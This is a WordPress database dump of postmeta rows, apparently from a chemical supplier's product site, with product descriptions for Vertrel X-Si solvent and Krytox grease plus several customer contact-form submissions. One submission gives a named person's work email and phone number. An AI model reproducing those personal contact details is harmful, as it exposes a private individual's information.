INSERT INTO `wp_postmeta` VALUES (22273, 2343, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (22274, 2343, '_field_16', 'EPON™ 825 resin \r\n\r\nOn this product , do you have a protocol to use  this resin ?\r\n\r\nThanks a lot \r\nBest regards \r\nClaudie '); 
INSERT INTO `wp_postmeta` VALUES (22275, 2343, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22276, 2343, '_sub_id', '2343'); 
INSERT INTO `wp_postmeta` VALUES (22277, 424, '_wp_attachment_image_alt', 'ReleaSys 88'); 
INSERT INTO `wp_postmeta` VALUES (22278, 423, '_wp_old_slug', 'releasys-88'); 
INSERT INTO `wp_postmeta` VALUES (22279, 423, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22280, 423, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22281, 423, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22283, 423, '_yoast_wpseo_focuskw', 'Water-based Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22284, 423, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22285, 423, '_yoast_wpseo_focuskeywords', '[{"keyword":"ReleaSys 88","score":"na"}]'); 
INSERT INTO `wp_postmeta` VALUES (22286, 2344, '_edit_lock', '1476378197:2'); 
INSERT INTO `wp_postmeta` VALUES (22287, 2344, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22288, 2345, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22289, 2345, '_seq_num', '33'); 
INSERT INTO `wp_postmeta` VALUES (22290, 2345, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22291, 2345, '_field_12', 'Jackie Francisco'); 
INSERT INTO `wp_postmeta` VALUES (22292, 2345, '_field_13', 'NWL Inc.'); 
INSERT INTO `wp_postmeta` VALUES (22293, 2345, '_field_18', 'unknown'); 
INSERT INTO `wp_postmeta` VALUES (22294, 2345, '_field_14', 'jfrancisco@nwl.com'); 
INSERT INTO `wp_postmeta` VALUES (22295, 2345, '_field_15', '(252) 747-5943'); 
INSERT INTO `wp_postmeta` VALUES (22296, 2345, '_field_16', 'We are updating our MSDS/SDS database and need one for your TFE Release Agent Dry Lubricant MS-122/A.  Can you please email this to me?\n\nIn case you need to contact me My Phone Ext is 2442.\n\nThanks,\nJackie\n'); 
INSERT INTO `wp_postmeta` VALUES (22297, 2345, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22298, 2345, '_sub_id', '2345'); 
INSERT INTO `wp_postmeta` VALUES (22301, 2349, '_wp_attached_file', '2016/10/shutterstock_470033000.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22302, 2349, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4783;s:6:"height";i:3189;s:4:"file";s:34:"2016/10/shutterstock_470033000.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_470033000-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_470033000-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_470033000-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_470033000-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_470033000-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_470033000-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_470033000-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_470033000-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22303, 2344, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (22304, 2344, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (22305, 2344, '_thumbnail_id', '2349'); 
INSERT INTO `wp_postmeta` VALUES (22306, 2344, '312_default_editor', '<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456"><strong>Physical Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Property</td>\r\n<td style="text-align: center;">Vertrel X-Si</td>\r\n</tr>\r\n<tr>\r\n<td>Molecular Weight</td>\r\n<td style="text-align: center;">203</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point, °C</td>\r\n<td style="text-align: center;">57</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density, kg/l</td>\r\n<td style="text-align: center;">1.05</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure, atm</td>\r\n<td style="text-align: center;">0.178</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension, N/m</td>\r\n<td style="text-align: center;">0.014</td>\r\n</tr>\r\n<tr>\r\n<td>Freezing Point, °C</td>\r\n<td style="text-align: center;">–50</td>\r\n</tr>\r\n<tr>\r\n<td>Heat of Vaporization at Boiling Point, kJ/kg</td>\r\n<td style="text-align: center;">159</td>\r\n</tr>\r\n<tr>\r\n<td>Heat Capacity, kJ/kg·°C</td>\r\n<td style="text-align: center;">N/A</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity, cPs</td>\r\n<td style="text-align: center;">0.6</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Closed Cup, °C</td>\r\n<td style="text-align: center;">–18</td>\r\n</tr>\r\n<tr>\r\n<td>Open Cup, °C</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Flammability In Air</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Lower Limit, vol%</td>\r\n<td style="text-align: center;">5</td>\r\n</tr>\r\n<tr>\r\n<td>Upper Limit, vol%</td>\r\n<td style="text-align: center;">*</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*Unable to determine Upper Limit due to condensation\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (22307, 2344, '716_default_editor', '<ul>\r\n 	<li>Silicone Deposition, Removal and Swelling</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (22308, 2344, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22309, 2344, '719_default_editor', '<ul>\r\n 	<li>ASTM D93</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (22310, 2344, '317_default_editor', '<table width="662">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="250">Aerosol</td>\r\n<td style="text-align: center;" width="206">Glass</td>\r\n<td style="text-align: center;" width="206">Pail</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;">Quart.</td>\r\n<td style="text-align: center;">5 Gallons</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">12 oz.</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">55 Gallons</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (22311, 2344, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22312, 2344, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (22313, 2344, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (22314, 2344, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (22315, 2344, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (22316, 2344, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (22317, 2344, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22318, 2344, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22319, 2344, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (22320, 2344, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22321, 2344, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (22322, 2344, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (22323, 2344, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (22324, 2344, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (22325, 2344, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (22326, 2344, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (22327, 2344, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (22328, 2344, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (22329, 2344, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (22330, 2344, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (22331, 2344, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (22332, 2344, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (22333, 2344, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22334, 2344, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22335, 2344, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (22336, 2344, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (22337, 2344, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (22338, 2344, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (22339, 2344, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22340, 2344, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22341, 2344, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (22342, 2344, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22343, 2344, '_ywtm_content_tab_description', '<strong>Introduction to Vertrel X-Si</strong>\r\n\r\nVertrel X-Si is a proprietary blend of Vertrel XF hydrofluorocarbon (2,3-dihydrodecafluoropentane) and hexamethyldisiloxane. It is ideally suited for use in medical applications as a solvent for cleaning or depositing silicone oilbased lubricants. It is also used as a swelling media for silicone rubber tubing.\r\n\r\nVertrel X-Si has “zero” ozone-depletion potential and low global warming potential, and is exempted as a volatile organic compound (VOC). Vertrel X-Si is accepted by the U.S. Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozone-depleting substances. It is an alternative to environmentally regulated fluids such as CFC-113, 1,1,1-trichloroethane\r\n(1,1,1-TCA or methylchloroform), HCFC-141b, and hexane, a VOC. Vertrel X-Si can replace high global warming potential materials like perfluorocarbon (PFC) fluids in similar applications in the medical field. Physical properties of Vertrel X-Si are shown in the <strong>technical data tab.</strong>\r\n\r\n<strong>Process of Use</strong>\r\n\r\nFor most applications using Vertrel X-Si, parts are immersed in the solvent at room temperature. Vertrel X-Si evaporates quickly, thus it is recommended that the vapor-to-air interface area be minimized and/or the solvent be cooled to promote efficient and effective use. Due to flammability characteristics, this product should be used in appropriately rated areas and equipment. If there is a need to use the solvent at higher temperatures, a flammable-rated, single sump vapor degreaser can be used. Vertrel X-Si is not an azeotrope, and should not be used in a two-sump vapor degreaser as components of the blend may separate.\r\n\r\n<strong>Solubility and Swelling</strong>\r\n\r\nLaboratory test data for solubility of common silicone fluids in Vertrel X-Si are shown in Table 1.\r\n\r\n&nbsp;\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="4" width="868">Table 1</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="4">Solubility of Typical Silicone Fluids in</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="4">Vertrel X-Si at Room Temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="4">(% Oil Loading in Solvent)</td>\r\n</tr>\r\n<tr>\r\n<td>Oil</td>\r\n<td style="text-align: center;">Vertrel X-Si</td>\r\n<td style="text-align: center;">CFC-113</td>\r\n<td style="text-align: center;">Hexane</td>\r\n</tr>\r\n<tr>\r\n<td>DC-200*</td>\r\n<td style="text-align: center;">14</td>\r\n<td style="text-align: center;">19</td>\r\n<td style="text-align: center;">25</td>\r\n</tr>\r\n<tr>\r\n<td>DC-360*</td>\r\n<td style="text-align: center;">21</td>\r\n<td style="text-align: center;">24</td>\r\n<td style="text-align: center;">46</td>\r\n</tr>\r\n<tr>\r\n<td>DC-550*</td>\r\n<td style="text-align: center;">33</td>\r\n<td style="text-align: center;">39</td>\r\n<td style="text-align: center;">58</td>\r\n</tr>\r\n<tr>\r\n<td>DC-1107*</td>\r\n<td style="text-align: center;">45</td>\r\n<td style="text-align: center;">51</td>\r\n<td style="text-align: center;">65</td>\r\n</tr>\r\n<tr>\r\n<td>NuSil Med 4159</td>\r\n<td style="text-align: center;">28</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">31</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*As manufactured by Dow Corning.\r\n\r\nData was also collected to measure swelling of polysilicone tubing. The data shown in Table 2 compares change in width and weight of polysilicone tubing in various solvents with Vertrel X-Si.\r\n\r\n&nbsp;\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="4" width="868">Table 2</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="4">Swelling of Polysilicone Tubing</td>\r\n</tr>\r\n<tr>\r\n<td>Test</td>\r\n<td style="text-align: center;">Vertrel X-Si</td>\r\n<td style="text-align: center;">CFC-113</td>\r\n<td style="text-align: center;">Hexane</td>\r\n</tr>\r\n<tr>\r\n<td>At Room Temperature</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>% Change in Width</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">23</td>\r\n</tr>\r\n<tr>\r\n<td>% Change in Weight</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">133</td>\r\n<td style="text-align: center;">83</td>\r\n</tr>\r\n<tr>\r\n<td>At Boiling Point*</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>% Change in Width</td>\r\n<td style="text-align: center;">20</td>\r\n<td style="text-align: center;">20</td>\r\n<td style="text-align: center;">24</td>\r\n</tr>\r\n<tr>\r\n<td>% Change in Weight</td>\r\n<td style="text-align: center;">64</td>\r\n<td style="text-align: center;">144</td>\r\n<td style="text-align: center;">63</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n* 47°C (117°F) for CFC-113; 54°C (129°F) for Vertrel KCD-X-Si; 68°C (154°F) for Hexane\r\n\r\nNote that Vertrel X-Si has similar swelling capability compared with hexane and CFC-113. However, Vertrel X-Si is superior in performance because it results in a much smaller weight gain of the polysilicone tubing due to solvent absorption. This is very desirable from the viewpoint of solvent consumption as well as a faster recovery of the polysilicone tubing to its original state.\r\n\r\n<strong>Plastic and Elastomer Compatibility</strong>\r\n\r\nVertrel X-Si is compatible with most polymeric materials commonly used in the medical application and has excellent compatibility with polycarbonate and polyurethane materials.\r\n\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air-drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\r\n\r\nTest data for plastics and elastomers compatibility are summarized in Tables 3 and 4. These tests simulate effects for exposures of parts in a cleaning cycle. Long-term compatibility data simulating exposure of equipment construction materials is available from Miller-Stephenson upon request.\r\n\r\n<strong>Metals and Other Compatibility</strong>\r\n\r\nVertrel X-Si is very stable with most common metals such as aluminum, copper, zinc, carbon steel, and stainless steel.\r\n\r\nContact with highly basic process materials, pH 10 or above, is not recommended.\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456"><strong>Table 3</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2">Plastic Compatibility</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2">Immersion: 15 Minutes at Room Temperature</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">Compatible</td>\r\n</tr>\r\n<tr>\r\n<td>Polyethylene</td>\r\n<td style="text-align: center;">ABS</td>\r\n</tr>\r\n<tr>\r\n<td>Polypropylene</td>\r\n<td style="text-align: center;">Acetal</td>\r\n</tr>\r\n<tr>\r\n<td>Polystyrene</td>\r\n<td style="text-align: center;">Acrylic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyester, PET, PBT</td>\r\n<td style="text-align: center;">Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Oxide, PPO</td>\r\n<td style="text-align: center;">Ionomer</td>\r\n</tr>\r\n<tr>\r\n<td>Polyimide, PI, PEI, PAI</td>\r\n<td style="text-align: center;">Liquid Crystal Polymer</td>\r\n</tr>\r\n<tr>\r\n<td>Polyetherketone, PEK</td>\r\n<td style="text-align: center;">Phenolic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyaryletherketone, PEEK</td>\r\n<td style="text-align: center;">PVC, CPVC</td>\r\n</tr>\r\n<tr>\r\n<td>Polysulfone</td>\r\n<td style="text-align: center;">PTFE, ETFE</td>\r\n</tr>\r\n<tr>\r\n<td>Polyarylsulfone</td>\r\n<td style="text-align: center;">Cellulosic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Sulfide, PPS</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td colspan="2" width="456">Table 4</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">Elastomer Compatibility</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">Immersion: 15 Minutes at Room Temperature</td>\r\n</tr>\r\n<tr>\r\n<td>Compatible</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Buna N, NBR, Nitrile</td>\r\n<td>Buna S, SBR, GRS</td>\r\n</tr>\r\n<tr>\r\n<td>Butyl Rubber, IIR</td>\r\n<td>Chlorosulfonated PE</td>\r\n</tr>\r\n<tr>\r\n<td>EPM, EPDM, Nordel®</td>\r\n<td>Polysulfide</td>\r\n</tr>\r\n<tr>\r\n<td>Natural Rubber, Isoprene</td>\r\n<td>Neoprene</td>\r\n</tr>\r\n<tr>\r\n<td>Polyurethane</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">Incompatible</td>\r\n</tr>\r\n<tr>\r\n<td>Viton® B</td>\r\n<td>Silicone</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Exposure Limit</strong>\r\n\r\nData from acute toxicity studies has demonstrated that Vertrel X-Si has low toxicity. Vertrel X-Si is a slight skin and eye irritant and has low acute inhalation toxicity.\r\n\r\n<strong>Flammability</strong>\r\n\r\nVertrel X-Si exhibits a closed cup flash point per the Pensky-Martens Closed Cup Tester (ASTM D 93) and is classified as a flammable liquid by NFPA or DOT. The product does exhibit vapor flammability limits in air, and has the potential to ignite and burn in an open vessel or in case of a spill, if an ignition source is present. Users should clear equipment of all vapors and liquids before performing any maintenance operations that could result in an ignition source.\r\n\r\nFlash point data and limits of flammability in air provide the user with additional information that should be used as elements of a fire risk assessment and to determine guidelines for the safe handling of volatile chemicals. Users should assure compliance with NFPA standards and local fire codes.\r\n\r\n<strong>Recovery</strong>\r\n\r\nRecovery of Vertrel X-Si is not recommended. The product is not an azeotrope, and composition of the recovered product cannot be assured.\r\n\r\nIf recovery is attempted, flammable rated areas and equipment should be used. The presence of soils may further change the characteristics of the material. Any recovery should be closely monitored to ensure operating levels are maintained. Users should test the spent Vertrel X-Si to ensure proper classification for waste disposal.\r\n\r\n<strong>Storage/Handling</strong>\r\n\r\nVertrel X-Si is thermally stable and does not oxidize or degrade during storage. Store in a clean, dry area. Protect from freezing temperatures. If solvent is stored below –10°C (14°F), mix prior to use. Do not allow stored product to exceed 52°C (125°F) to prevent leakage or potential rupture of container from pressure and expansion. Vertrel X-Si is classified as a flammable liquid by DOT/NFPA. It does have flammable limits in air, and has the potential to ignite in an open vessel or in case of a spill, if an ignition source is present. A flammable-rated drum pump is recommended to dispense the product from its container.\r\n\r\n<strong>Environmental Legislation</strong>\r\n\r\nVertrel specialty fluids have “zero” ozonedepletion potential and low global warming potential (Table 5). They are used as alternatives to CFC-113, methylchloroform, hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many critical cleaning, drying, carrier fluid, and other high-value specialty uses where reliability is paramount.\r\n\r\nVertrel® X-Si is accepted by the U.S. Environmental Protection Agency (EPA) under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozonedepleting substances. Vertrel XF and hexamethyldisiloxane are exempt from classification as volatile organic compounds (VOCs) by the EPA. Vertrel X-Si is also VOC compliant under the California South Coast Air Quality Management District (SCAQMD) regulations, which require VOC content less than 50 g/L of solvent.\r\n\r\nThe components of Vertrel X-Si are listed in the TSCA inventory. One component, HFC-43-10mee, is subject to the Significant New Use Rule (SNUR) and should be used only in the indicated applications. See MSDS Regulatory Section.\r\n\r\nVertrel X-Si is not a hazardous air pollutant (HAP), and therefore not subject to NESHAP regulation. DuPont Vertrel X-Si is not included in the SARA Title III Section 313 list of toxic chemicals, and is not subject to SARA Title III (EPCRA) reporting requirements.\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456">Table 5</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2">Environmental Properties</td>\r\n</tr>\r\n<tr>\r\n<td>Property</td>\r\n<td style="text-align: center;">Vertrel X-Si</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone-Depletion Potential (ODP)</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming Potential (GWP/100 yr ITH)*</td>\r\n<td style="text-align: center;">741</td>\r\n</tr>\r\n<tr>\r\n<td>Volatile Organic Compounds (VOC, g/L)</td>\r\n<td style="text-align: center;">Exempt</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Specifications</strong>\r\n\r\nComposition and specifications are shown in Table 6. All components are listed in the TSCA Inventory.\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456">Table 6</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2">Vertrel X-Si Specifications</td>\r\n</tr>\r\n<tr>\r\n<td>Vertrel XF, wt%</td>\r\n<td style="text-align: center;">57.0 ±1.0</td>\r\n</tr>\r\n<tr>\r\n<td>Hexamethyldisiloxane, wt%</td>\r\n<td style="text-align: center;">43.0 ±1.0</td>\r\n</tr>\r\n<tr>\r\n<td>Nonvolatile Residue, ppm wt</td>\r\n<td style="text-align: center;">10 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Moisture, ppm wt</td>\r\n<td style="text-align: center;">200 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">Clear, Colorless</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">Click here to learn more about Vertrel fluids.</a>'); 
INSERT INTO `wp_postmeta` VALUES (22344, 2344, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (22345, 2344, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22346, 2344, '_yoast_wpseo_primary_product_cat', '232'); 
INSERT INTO `wp_postmeta` VALUES (22347, 2344, '_yoast_wpseo_focuskw_text_input', 'Vertrel X-Si'); 
INSERT INTO `wp_postmeta` VALUES (22348, 2344, '_yoast_wpseo_focuskw', 'Vertrel X-Si'); 
INSERT INTO `wp_postmeta` VALUES (22349, 2344, '_yoast_wpseo_title', 'Vertrel X-Si Specialty Fluid - Silicone Deposition, Removal and Swelling'); 
INSERT INTO `wp_postmeta` VALUES (22350, 2344, '_yoast_wpseo_metadesc', 'Vertrel X-Si is ideally suited for use in medical applications as a solvent for cleaning or depositing silicone oil based lubricants.'); 
INSERT INTO `wp_postmeta` VALUES (22351, 2344, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22352, 2344, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22353, 675, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22354, 675, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22355, 675, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (22356, 675, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22357, 675, '_ywtm_content_tab_description', '<strong>Krytox XHT-BD</strong>\r\nKrytox XHT-BD series oils are special extreme high temperature greases with low oil evaporation that are thickened with a non-melting thickener to allow use at temperatures above the melting point of common greases. They have excellent lubrication over a broad temperature range. Krytox XHT-BD series greases are nonflammable and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\r\n\r\nKrytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-BD greases are for use in low speed bearings or in pillow housings and will shear at high speeds, causing loss of oil in sealed bearings. The oil in the grease can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life.\r\n\r\n<strong>Compatibility with Metals</strong>\r\nDue to their low surface tensions, Krytox oils easily wet metallic surfaces; and, because of their inertness, Krytox oils have little or no adverse effect on metals. Testing of metals at 340 °C (644 °F) in the absence of air has shown little evidence of corrosion. In the presence of air, corrosion was slightly higher. The presence of molybdenum in the metals improved corrosion resistance.\r\n\r\nBecause of its thermal stability and non-oxidizing characteristics, Krytox is a natural high-temperature lubricant. Krytox XHT greases are available with useful temperature ranges up to 360 °C (680 °F) for continuous use, with spikes to 400 °C (752 °F), when used in proper metallurgy with periodic re-lubrication.'); 
INSERT INTO `wp_postmeta` VALUES (22358, 675, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (22359, 2344, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22360, 420, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (22362, 419, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22363, 419, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22364, 419, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22365, 419, '_yoast_wpseo_focuskw_text_input', 'Rubber Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (22366, 419, '_yoast_wpseo_focuskw', 'Rubber Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (22367, 419, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22368, 419, '_yoast_wpseo_focuskeywords', '[{"keyword":"ReleaSys 85","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22376, 419, '_wp_old_slug', 'releasys-85'); 
INSERT INTO `wp_postmeta` VALUES (22377, 419, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22378, 419, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22379, 419, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (22380, 419, '_ywtm_title_tab_description', 'Description'); 
